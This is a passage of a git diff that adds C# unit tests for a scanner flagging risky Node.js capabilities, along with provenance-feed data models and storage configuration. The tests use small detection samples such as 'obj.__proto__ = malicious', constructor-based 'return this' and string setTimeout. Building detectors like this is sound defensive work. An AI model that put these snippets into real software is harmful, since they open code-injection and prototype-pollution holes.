+ Assert.Equal("require('vm')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsVmRunInContext()
+ {
+ const string code = @"vm.runInContext(code, context);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("vm.runInContext", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsVmRunInNewContext()
+ {
+ const string code = @"vm.runInNewContext(code, sandbox);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("vm.runInNewContext", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSetTimeoutWithString()
+ {
+ const string code = @"setTimeout('alert(1)', 1000);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("setTimeout with string", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireVm2()
+ {
+ const string code = @"const { VM } = require('vm2');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("require('vm2')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewProxy()
+ {
+ const string code = @"const proxy = new Proxy(target, handler);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("new Proxy", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProtoAccess()
+ {
+ const string code = @"obj.__proto__ = malicious;";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("__proto__", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsObjectSetPrototypeOf()
+ {
+ const string code = @"Object.setPrototypeOf(obj, proto);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Object.setPrototypeOf", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsConstructorAccess()
+ {
+ const string code = @"obj.constructor('return this')();";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal(".constructor()", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireNodeAddon()
+ {
+ const string code = @"const addon = require('./build/Release/addon.node');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("require('.node')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessDlopen()
+ {
+ const string code = @"process.dlopen(module, filename);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("process.dlopen", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireFfiNapi()
+ {
+ const string code = @"const ffi = require('ffi-napi');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("require('ffi-napi')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWebAssemblyInstantiate()
+ {
+ const string code = @"const instance = await WebAssembly.instantiate(wasmBuffer);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("WebAssembly.instantiate", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWebAssemblyCompile()
+ {
+ const string code = @"const module = await WebAssembly.compile(wasmBuffer);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("WebAssembly.compile", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Other Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireWorkerThreads()
+ {
+ const string code = @"const { Worker } = require('worker_threads');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("require('worker_threads')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessKill()
+ {
+ const string code = @"process.kill(pid, 'SIGTERM');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("process.kill", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDynamicRequire()
+ {
+ const string code = @"const mod = require(moduleName);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("require(variable)", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireInspector()
+ {
+ const string code = @"const inspector = require('inspector');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("require('inspector')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region NodeCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new NodeCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.js",
+ 10,
+ "child_process.exec");
+
+ Assert.Equal("Exec|test.js|10|child_process.exec", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new NodeCapabilityEvidence(
+ CapabilityKind.Exec, "test.js", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new NodeCapabilityEvidence(
+ CapabilityKind.Exec, "test.js", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new NodeCapabilityEvidence(
+ CapabilityKind.DynamicCode,
+ "test.js",
+ 10,
+ "eval",
+ snippet: "eval(userInput);",
+ confidence: 1.0f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("dynamiccode", metadata["capability.kind"]);
+ Assert.Equal("test.js:10", metadata["capability.source"]);
+ Assert.Equal("eval", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("1.00", metadata["capability.confidence"]);
+ Assert.Contains("eval", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new NodeCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.js",
+ 10,
+ "child_process.exec");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("test.js", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:child_process.exec", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Signals/StellaOps.Signals/Models/AocProvenance.cs b/src/Signals/StellaOps.Signals/Models/AocProvenance.cs
new file mode 100644
index 000000000..286cf2965
--- /dev/null
+++ b/src/Signals/StellaOps.Signals/Models/AocProvenance.cs
@@ -0,0 +1,343 @@
+using System;
+using System.Collections.Generic;
+using System.Text.Json.Serialization;
+using MongoDB.Bson.Serialization.Attributes;
+
+namespace StellaOps.Signals.Models;
+
+///
+/// AOC (Aggregation-Only Contract) provenance feed for runtime facts ingestion (SGSI0101).
+/// Conforms to docs/schemas/provenance-feed.schema.json.
+///
+public sealed class ProvenanceFeed
+{
+ public const int CurrentSchemaVersion = 1;
+
+ [BsonElement("schemaVersion")]
+ [JsonPropertyName("schemaVersion")]
+ public int SchemaVersion { get; init; } = CurrentSchemaVersion;
+
+ [BsonElement("feedId")]
+ [JsonPropertyName("feedId")]
+ public string FeedId { get; init; } = Guid.NewGuid().ToString("D");
+
+ [BsonElement("feedType")]
+ [JsonPropertyName("feedType")]
+ public ProvenanceFeedType FeedType { get; init; } = ProvenanceFeedType.RuntimeFacts;
+
+ [BsonElement("generatedAt")]
+ [JsonPropertyName("generatedAt")]
+ public DateTimeOffset GeneratedAt { get; init; } = DateTimeOffset.UtcNow;
+
+ [BsonElement("sourceService")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("sourceService")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SourceService { get; init; }
+
+ [BsonElement("tenantId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("tenantId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? TenantId { get; init; }
+
+ [BsonElement("correlationId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("correlationId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? CorrelationId { get; init; }
+
+ [BsonElement("records")]
+ [JsonPropertyName("records")]
+ public List Records { get; init; } = new();
+
+ [BsonElement("metadata")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("metadata")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public Dictionary? Metadata { get; init; }
+
+ [BsonElement("attestation")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("attestation")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public FeedAttestation? Attestation { get; init; }
+}
+
+[JsonConverter(typeof(JsonStringEnumConverter))]
+public enum ProvenanceFeedType
+{
+ [JsonPropertyName("RUNTIME_FACTS")]
+ RuntimeFacts,
+
+ [JsonPropertyName("SIGNAL_ENRICHMENT")]
+ SignalEnrichment,
+
+ [JsonPropertyName("CAS_PROMOTION")]
+ CasPromotion,
+
+ [JsonPropertyName("SCORING_OUTPUT")]
+ ScoringOutput,
+
+ [JsonPropertyName("AUTHORITY_SCOPES")]
+ AuthorityScopes
+}
+
+///
+/// Individual provenance record within a feed.
+///
+public sealed class ProvenanceRecord
+{
+ [BsonElement("recordId")]
+ [JsonPropertyName("recordId")]
+ public string RecordId { get; init; } = Guid.NewGuid().ToString("D");
+
+ [BsonElement("recordType")]
+ [JsonPropertyName("recordType")]
+ public string RecordType { get; init; } = string.Empty;
+
+ [BsonElement("subject")]
+ [JsonPropertyName("subject")]
+ public ProvenanceSubject Subject { get; init; } = new();
+
+ [BsonElement("occurredAt")]
+ [JsonPropertyName("occurredAt")]
+ public DateTimeOffset OccurredAt { get; init; }
+
+ [BsonElement("observedBy")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("observedBy")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? ObservedBy { get; init; }
+
+ [BsonElement("confidence")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("confidence")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public double? Confidence { get; init; }
+
+ [BsonElement("facts")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("facts")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public RuntimeProvenanceFacts? Facts { get; init; }
+
+ [BsonElement("evidence")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("evidence")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public RecordEvidence? Evidence { get; init; }
+}
+
+///
+/// Subject of a provenance record.
+///
+public sealed class ProvenanceSubject
+{
+ [BsonElement("type")]
+ [JsonPropertyName("type")]
+ public ProvenanceSubjectType Type { get; init; } = ProvenanceSubjectType.Package;
+
+ [BsonElement("identifier")]
+ [JsonPropertyName("identifier")]
+ public string Identifier { get; init; } = string.Empty;
+
+ [BsonElement("digest")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("digest")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? Digest { get; init; }
+
+ [BsonElement("namespace")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("namespace")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? Namespace { get; init; }
+}
+
+[JsonConverter(typeof(JsonStringEnumConverter))]
+public enum ProvenanceSubjectType
+{
+ [JsonPropertyName("CONTAINER")]
+ Container,
+
+ [JsonPropertyName("PROCESS")]
+ Process,
+
+ [JsonPropertyName("PACKAGE")]
+ Package,
+
+ [JsonPropertyName("FILE")]
+ File,
+
+ [JsonPropertyName("NETWORK")]
+ Network,
+
+ [JsonPropertyName("IMAGE")]
+ Image
+}
+
+///
+/// Runtime-specific provenance facts.
+///
+public sealed class RuntimeProvenanceFacts
+{
+ [BsonElement("symbolId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("symbolId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SymbolId { get; init; }
+
+ [BsonElement("processName")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("processName")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? ProcessName { get; init; }
+
+ [BsonElement("processId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("processId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public int? ProcessId { get; init; }
+
+ [BsonElement("socketAddress")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("socketAddress")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SocketAddress { get; init; }
+
+ [BsonElement("containerId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("containerId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? ContainerId { get; init; }
+
+ [BsonElement("hitCount")]
+ [JsonPropertyName("hitCount")]
+ public int HitCount { get; init; }
+
+ [BsonElement("purl")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("purl")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? Purl { get; init; }
+
+ [BsonElement("codeId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("codeId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? CodeId { get; init; }
+
+ [BsonElement("buildId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("buildId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? BuildId { get; init; }
+
+ [BsonElement("loaderBase")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("loaderBase")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? LoaderBase { get; init; }
+
+ [BsonElement("metadata")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("metadata")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public Dictionary? Metadata { get; init; }
+}
+
+///
+/// Evidence supporting a provenance record.
+///
+public sealed class RecordEvidence
+{
+ [BsonElement("sourceDigest")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("sourceDigest")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SourceDigest { get; init; }
+
+ [BsonElement("captureMethod")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("captureMethod")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public EvidenceCaptureMethod? CaptureMethod { get; init; }
+
+ [BsonElement("rawDataRef")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("rawDataRef")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? RawDataRef { get; init; }
+}
+
+[JsonConverter(typeof(JsonStringEnumConverter))]
+public enum EvidenceCaptureMethod
+{
+ [JsonPropertyName("eBPF")]
+ EBpf,
+
+ [JsonPropertyName("PROC_SCAN")]
+ ProcScan,
+
+ [JsonPropertyName("API_CALL")]
+ ApiCall,
+
+ [JsonPropertyName("LOG_ANALYSIS")]
+ LogAnalysis,
+
+ [JsonPropertyName("STATIC_ANALYSIS")]
+ StaticAnalysis
+}
+
+///
+/// Attestation metadata for a provenance feed.
+///
+public sealed class FeedAttestation
+{
+ [BsonElement("predicateType")]
+ [JsonPropertyName("predicateType")]
+ public string PredicateType { get; init; } = "https://stella.ops/attestation/provenance-feed/v1";
+
+ [BsonElement("signedAt")]
+ [JsonPropertyName("signedAt")]
+ public DateTimeOffset SignedAt { get; init; }
+
+ [BsonElement("keyId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("keyId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? KeyId { get; init; }
+
+ [BsonElement("envelopeDigest")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("envelopeDigest")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? EnvelopeDigest { get; init; }
+
+ [BsonElement("transparencyLog")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("transparencyLog")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? TransparencyLog { get; init; }
+}
+
+///
+/// Context facts container stored on ReachabilityFactDocument.
+///
+public sealed class ContextFacts
+{
+ [BsonElement("provenance")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("provenance")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public ProvenanceFeed? Provenance { get; set; }
+
+ [BsonElement("lastUpdatedAt")]
+ [JsonPropertyName("lastUpdatedAt")]
+ public DateTimeOffset LastUpdatedAt { get; set; }
+
+ [BsonElement("recordCount")]
+ [JsonPropertyName("recordCount")]
+ public int RecordCount { get; set; }
+}
diff --git a/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs b/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs
index 5642ef398..ef2fad8c4 100644
--- a/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs
+++ b/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs
@@ -31,6 +31,10 @@ public sealed class ReachabilityFactDocument
[BsonIgnoreIfNull]
public Dictionary? Metadata { get; set; }
+ [BsonElement("contextFacts")]
+ [BsonIgnoreIfNull]
+ public ContextFacts? ContextFacts { get; set; }
+
[BsonElement("score")]
public double Score { get; set; }
diff --git a/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs b/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs
index d27bc0096..5b6ee3e98 100644
--- a/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs
+++ b/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs
@@ -1,4 +1,5 @@
using System;
+using System.Collections.Generic;
using System.IO;
namespace StellaOps.Signals.Options;
@@ -9,18 +10,144 @@ namespace StellaOps.Signals.Options;
public sealed class SignalsArtifactStorageOptions
{
///
- /// Root directory used to persist raw callgraph artifacts.
+ /// Storage driver: "filesystem" (default) or "rustfs".
+ ///
+ public string Driver { get; set; } = SignalsStorageDrivers.FileSystem;
+
+ ///
+ /// Root directory used to persist raw callgraph artifacts (filesystem driver).
///
public string RootPath { get; set; } = Path.Combine(AppContext.BaseDirectory, "callgraph-artifacts");
+ ///
+ /// Bucket name for CAS storage (RustFS driver).
+ /// Per CAS contract, signals uses "signals-data" bucket.
+ ///
+ public string BucketName { get; set; } = "signals-data";
+
+ ///
+ /// Root prefix within the bucket for callgraph artifacts.
+ ///
+ public string RootPrefix { get; set; } = "callgraphs";
+
+ ///
+ /// RustFS-specific options.
+ ///
+ public SignalsRustFsOptions RustFs { get; set; } = new();
+
+ ///
+ /// Additional headers to include in storage requests.
+ ///
+ public IDictionary Headers { get; } = new Dictionary(StringComparer.OrdinalIgnoreCase);
+
+ ///
+ /// Returns true if the filesystem driver is configured.
+ ///
+ public bool IsFileSystemDriver()
+ => string.Equals(Driver, SignalsStorageDrivers.FileSystem, StringComparison.OrdinalIgnoreCase);
+
+ ///
+ /// Returns true if the RustFS driver is configured.
+ ///
+ public bool IsRustFsDriver()
+ => string.Equals(Driver, SignalsStorageDrivers.RustFs, StringComparison.OrdinalIgnoreCase);
+
///
/// Validates the configured values.
///
public void Validate()
{
- if (string.IsNullOrWhiteSpace(RootPath))
+ if (!IsFileSystemDriver() && !IsRustFsDriver())
{
- throw new InvalidOperationException("Signals artifact storage path must be configured.");
+ throw new InvalidOperationException($"Signals storage driver '{Driver}' is not supported. Use '{SignalsStorageDrivers.FileSystem}' or '{SignalsStorageDrivers.RustFs}'.");
+ }
+
+ if (IsFileSystemDriver() && string.IsNullOrWhiteSpace(RootPath))
+ {
+ throw new InvalidOperationException("Signals artifact storage path must be configured for filesystem driver.");
+ }
+
+ if (IsRustFsDriver())
+ {
+ RustFs ??= new SignalsRustFsOptions();
+ RustFs.Validate();
+
+ if (string.IsNullOrWhiteSpace(BucketName))
+ {
+ throw new InvalidOperationException("Signals storage bucket name must be configured for RustFS driver.");
+ }
}
}
}
+
+///
+/// RustFS-specific configuration options.
+///
+public sealed class SignalsRustFsOptions
+{
+ ///
+ /// Base URL for the RustFS service (e.g., http://localhost:8180/api/v1).
+ ///
+ public string BaseUrl { get; set; } = string.Empty;
+
+ ///
+ /// Allow insecure TLS connections (development only).
+ ///
+ public bool AllowInsecureTls { get; set; }
+
+ ///
+ /// API key for authentication.
+ ///
+ public string? ApiKey { get; set; }
+
+ ///
+ /// Header name for the API key (e.g., "X-API-Key").
+ ///
+ public string ApiKeyHeader { get; set; } = "X-API-Key";
+
+ ///
+ /// HTTP request timeout.
+ ///
+ public TimeSpan Timeout { get; set; } = TimeSpan.FromSeconds(60);
+
+ ///
+ /// Validates the configured values.
+ ///
+ public void Validate()
+ {
+ if (string.IsNullOrWhiteSpace(BaseUrl))
+ {
+ throw new InvalidOperationException("RustFS baseUrl must be configured.");
+ }
+
+ if (!Uri.TryCreate(BaseUrl, UriKind.Absolute, out var uri))
+ {
+ throw new InvalidOperationException("RustFS baseUrl must be an absolute URI.");
+ }
+
+ if (!string.Equals(uri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
+ && !string.Equals(uri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase))
+ {
+ throw new InvalidOperationException("RustFS baseUrl must use HTTP or HTTPS.");
+ }
+
+ if (Timeout <= TimeSpan.Zero)
+ {
+ throw new InvalidOperationException("RustFS timeout must be greater than zero.");
+ }
+
+ if (!string.IsNullOrWhiteSpace(ApiKeyHeader) && string.IsNullOrWhiteSpace(ApiKey))
+ {
+ throw new InvalidOperationException("RustFS API key header name requires a non-empty API key.");
+ }
+ }
+}
+
+///
+/// Supported storage driver names.
+///
+public static class SignalsStorageDrivers
+{
+ public const string FileSystem = "filesystem";
+ public const string RustFs = "rustfs";
+}
diff --git a/src/Signals/StellaOps.Signals/Program.cs b/src/Signals/StellaOps.Signals/Program.cs
index 7de62882f..fc7f6e0be 100644
--- a/src/Signals/StellaOps.Signals/Program.cs
+++ b/src/Signals/StellaOps.Signals/Program.cs
@@ -1,7 +1,8 @@
-using System.IO;
-using System.Threading.Tasks;
-using Microsoft.AspNetCore.Authentication;
-using Microsoft.AspNetCore.Mvc;
+using System.IO;
+using System.Net.Http;
+using System.Threading.Tasks;
+using Microsoft.AspNetCore.Authentication;
+using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Options;
using MongoDB.Driver;
using NetEscapades.Configuration.Yaml;
@@ -9,16 +10,16 @@ using StellaOps.Auth.Abstractions;
using StellaOps.Auth.ServerIntegration;
using StellaOps.Configuration;
using StellaOps.Signals.Authentication;
-using StellaOps.Signals.Hosting;
-using StellaOps.Signals.Models;
-using StellaOps.Signals.Options;
-using StellaOps.Signals.Parsing;
-using StellaOps.Signals.Persistence;
-using StellaOps.Signals.Routing;
-using StellaOps.Signals.Services;
-using StellaOps.Signals.Storage;
-
-var builder = WebApplication.CreateBuilder(args);
+using StellaOps.Signals.Hosting;
+using StellaOps.Signals.Models;
+using StellaOps.Signals.Options;
+using StellaOps.Signals.Parsing;
+using StellaOps.Signals.Persistence;
+using StellaOps.Signals.Routing;
+using StellaOps.Signals.Services;
+using StellaOps.Signals.Storage;
+
+var builder = WebApplication.CreateBuilder(args);
builder.Configuration.AddStellaOpsDefaults(options =>
{
@@ -74,10 +75,10 @@ builder.Services.AddOptions()
.ValidateOnStart();
builder.Services.AddSingleton(sp => sp.GetRequiredService>().Value);
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(TimeProvider.System);
-builder.Services.AddSingleton();
-builder.Services.AddProblemDetails();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton(TimeProvider.System);
+builder.Services.AddSingleton();
+builder.Services.AddProblemDetails();
builder.Services.AddHealthChecks();
builder.Services.AddRouting(options => options.LowercaseUrls = true);
@@ -96,59 +97,87 @@ builder.Services.AddSingleton(sp =>
return mongoClient.GetDatabase(databaseName);
});
-builder.Services.AddSingleton>(sp =>
-{
- var opts = sp.GetRequiredService>().Value;
- var database = sp.GetRequiredService();
- var collection = database.GetCollection(opts.Mongo.CallgraphsCollection);
- EnsureCallgraphIndexes(collection);
- return collection;
-});
-
-builder.Services.AddSingleton>(sp =>
-{
- var opts = sp.GetRequiredService>().Value;
- var database = sp.GetRequiredService();
- var collection = database.GetCollection(opts.Mongo.ReachabilityFactsCollection);
- EnsureReachabilityFactIndexes(collection);
- return collection;
-});
-
-builder.Services.AddSingleton>(sp =>
-{
- var opts = sp.GetRequiredService>().Value;
- var database = sp.GetRequiredService();
- var collection = database.GetCollection(opts.Mongo.UnknownsCollection);
- EnsureUnknownsIndexes(collection);
- return collection;
-});
-
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("java"));
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("nodejs"));
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("python"));
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("go"));
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(sp =>
-{
- var options = sp.GetRequiredService>().Value;
- return new RedisReachabilityCache(options.Cache);
-});
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(sp =>
-{
- var inner = sp.GetRequiredService();
- var cache = sp.GetRequiredService();
- return new ReachabilityFactCacheDecorator(inner, cache);
-});
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
+builder.Services.AddSingleton>(sp =>
+{
+ var opts = sp.GetRequiredService>().Value;
+ var database = sp.GetRequiredService();
+ var collection = database.GetCollection(opts.Mongo.CallgraphsCollection);
+ EnsureCallgraphIndexes(collection);
+ return collection;
+});
+
+builder.Services.AddSingleton>(sp =>
+{
+ var opts = sp.GetRequiredService>().Value;
+ var database = sp.GetRequiredService();
+ var collection = database.GetCollection(opts.Mongo.ReachabilityFactsCollection);
+ EnsureReachabilityFactIndexes(collection);
+ return collection;
+});
+
+builder.Services.AddSingleton>(sp =>
+{
+ var opts = sp.GetRequiredService>().Value;
+ var database = sp.GetRequiredService();
+ var collection = database.GetCollection(opts.Mongo.UnknownsCollection);
+ EnsureUnknownsIndexes(collection);
+ return collection;
+});
+
+builder.Services.AddSingleton();
+
+// Configure callgraph artifact storage based on driver
+if (bootstrap.Storage.IsRustFsDriver())
+{
+ // Configure HttpClient for RustFS
